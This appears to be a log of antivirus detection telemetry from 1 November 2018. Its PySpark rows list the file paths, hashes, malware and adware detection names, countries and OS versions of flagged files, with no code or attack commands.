  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgECD7C.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='C:\\Program Files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:41:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE48D2.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE48D2.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:09:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.vir', filepath='C:\\Program Files (x86)\\bilibili\\bilibili.VIR', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:46:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210556-0f5dfe8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2719552d\\AVSCAN-20181101-194621-414F84DB\\AVSCAN-20181101-210556-0F5DFE8F', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:05:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdiplus.dll', filepath='C:\\Program Files (x86)\\OpenOffice 4\\program\\gdiplus.dll', filesize=1860000, name='W32/Ramnit.C.#M1.#R1'), hash='b3b1614ba01b3e6e1788e5f8b8ff0fa4dca6f673fa7d00e28dfb033e26972b57', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:50:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b405f8972ceda4809909c6f233805462452eb67d32b04a4eca4b6f3d95175684', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B405F8972CEDA4809909C6F233805462452EB67D32B04A4ECA4B6F3D95175684', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b405f8972ceda4809909c6f233805462452eb67d32b04a4eca4b6f3d95175684', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b41aa7556e724573dd6a0c00baa019aaa68a97f9ccf0fdfe70e358418fc9b263', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B41AA7556E724573DD6A0C00BAA019AAA68A97F9CCF0FDFE70E358418FC9B263', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b41aa7556e724573dd6a0c00baa019aaa68a97f9ccf0fdfe70e358418fc9b263', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:43:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b454707979a453226ea1a212be0aa21c5c2fa5a2b73c6834157cf7d5e0f90636', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B454707979A453226EA1A212BE0AA21C5C2FA5A2B73C6834157CF7D5E0F90636', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b454707979a453226ea1a212be0aa21c5c2fa5a2b73c6834157cf7d5e0f90636', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:48:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B478F1A0C4EAA3F21EFDEEF6ACEEE8A7E688D44862082FAC5743A19D2BB4C0EA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b47a6f388e42623497fad3ddc07e1ee59e38ae820b13b300479dd377d4b2594d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B501246D6C377C9413E3595C6DED65F3F0B5756AB0B6DEA91429B09A5CAE9044', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:21:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='backup files 9.zip', filepath='\\\\?\\D:\\GAMER-PC-PC\\Backup Set 2017-03-28 010046\\Backup Files 2017-03-28 010046\\Backup files 9.zip', filesize=174068000, name='W2000M/Agent.248543.#M1.#R1'), hash='b521cd73bfe45ed9d5be8fb4f5b70cd94bfc68acb0fee2df5ab970f14f2d3a79', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:51:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='settingsvideo.html', filepath='C:\\Program Files\\HTC\\HTC Sync Manager\\ui\\htmls\\SettingsVideo.html', filesize=380000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b52377f63628ad151ea5eeb775b35b265dd57a1918a2a2b44ed8bdb52f353965', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818264, timestamp='2018-11-01T23:38:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='b55a26f59e2dd6b1cb53b8f06b64709ac9919c3557192bf3c6b891bc13782044', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B5E0499D414FBAEDE45BC88483AABD98ED37FDC05508CFD8B727CE0322AFA1F6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ndp46-kb3045560-web.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045560-Web.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='b5f1fddc646129d18881165e61a34decbf12ac8274a756119958ca55f91f4c4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b654b8e22edcf1fb46d802766fd3b7eac211e69b7603f4f69b3651aee19775a7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B654B8E22EDCF1FB46D802766FD3B7EAC211E69B7603F4F69B3651AEE19775A7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b654b8e22edcf1fb46d802766fd3b7eac211e69b7603f4f69b3651aee19775a7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b65642242ab44c369f7a5f71b3ab9c77ab60d2b213c6902e16d68ce82953f9ff', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T12:44:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6628e0c4a63017570a1c553210a2c791876a6bfa94048ee747d174b092f1c79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B6628E0C4A63017570A1C553210A2C791876A6BFA94048EE747D174B092F1C79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6628e0c4a63017570a1c553210a2c791876a6bfa94048ee747d174b092f1c79', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:21:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='teracopydisable.exe', filepath='K:\\HBCD\\Programs\\TERACOPYDISABLE.EXE', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191107-2e6ee63f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191107-2E6EE63F', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005017-bcf62dcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-005017-BCF62DCF', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b6a8b40c0898fcefcf903a98f94583aa09bc3759b4237d5f0047313a8bc3235f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:50:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013123-27d4591d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-013123-27D4591D', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b6a8b40c0898fcefcf903a98f94583aa09bc3759b4237d5f0047313a8bc3235f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:31:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B6CD48E429AAA624EF27019A367E51CB048A3784AB5637011DD3166129E56BC4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6cd48e429aaa624ef27019a367e51cb048a3784ab5637011dd3166129e56bc4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='b6f616b8b8d7c379da50992ce2635b5e9b513e91ec3f27412793d23f872cbd2c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T08:39:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='out_danger_umain', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_265276399\\out_danger_umain', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='b7011fa1fd95c3bf04d96faeb644cce75f61085750352b503a0c4f3cd7897344', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http-server\\http-server.exe', parentsize=5295616, timestamp='2018-11-01T09:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:30:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:57:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe34_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe34 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='in_avi.dll', filepath='C:\\program files (x86)\\Winamp\\Plugins\\in_avi.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='b813244f5041b5861ab58d494d576dfb0e35034fa0dc7f78b0032b51863cebc3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:07:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b82265ef0bcfa2df852e2a1c0919268c2a6e676a3d6dc7544d7c8e5a9632704f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B82265EF0BCFA2DF852E2A1C0919268C2A6E676A3D6DC7544D7C8E5A9632704F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b82265ef0bcfa2df852e2a1c0919268c2a6e676a3d6dc7544d7c8e5a9632704f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:44:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:32:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:43:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\PROGRAM FILES\\PURE CODEC\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='purchase_order.iso', filepath='\\\\.\\C:\\Users\\X\\AppData\\Roaming\\Avira\\Antivirus\\MAIL\\TEMP\\00001a08\\ML00201.DIR\\Purchase_Order.iso', filesize=512000, name='TR/Dropper.VB.elr.#M1.#R1'), hash='b87c091078ba4c717c793ace6a45fb5e9265f1200c81c62d5d4a8299bd9b987e', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B88145EA3199CAFF8A67E4AB0DA01C8BD5822FC86A39CAB40C1D33E308FE10CD', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b8955ff8331d9364fcecad68af94784da6e675b61e2f9e6ecf2b9ba588b576d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T19:04:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='customactionsm.exe', filepath='C:\\Program Files\\ScanSoft\\PaperPort\\CustomActionsM.exe', filesize=116000, name='W32/Infector.Gen.#M300.#R7863'), hash='b89d22f489f494da2364afa46a53b5ed4959a4622417d2c5b6dc9422d4c7e923', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:44:19Z'), dt=datetime.date(2018, 11, 1)),
